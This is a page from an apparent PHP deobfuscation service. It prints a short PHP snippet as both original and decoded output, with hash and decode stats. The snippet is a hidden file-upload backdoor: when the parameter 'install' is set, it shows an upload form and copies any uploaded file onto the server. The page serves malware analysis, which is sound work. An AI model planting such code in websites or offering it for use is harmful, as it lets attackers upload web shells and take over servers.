Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(isset($_GET['install'])){ echo "<form action='' method='post' enctype='multip..
Decoded Output download
<?php
if(isset($_GET['install'])){
echo "<form action='' method='post' enctype='multipart/form-data' name='uper' id='uper'><input type='file' name='file'><input name='_upl' type='submit' id='_upl' value='up'></form>";if($_POST['_upl']=='up') {if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>up!!!</b><br><br>';}}
} ?>
Did this file decode correctly?
Original Code
<?php
if(isset($_GET['install'])){
echo "<form action='' method='post' enctype='multipart/form-data' name='uper' id='uper'><input type='file' name='file'><input name='_upl' type='submit' id='_upl' value='up'></form>";if($_POST['_upl']=='up') {if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>up!!!</b><br><br>';}}
}
Function Calls
None |
Stats
MD5 | 4ee9e9351b04cd9b710e18ec12b78196 |
Eval Count | 0 |
Decode Time | 84 ms |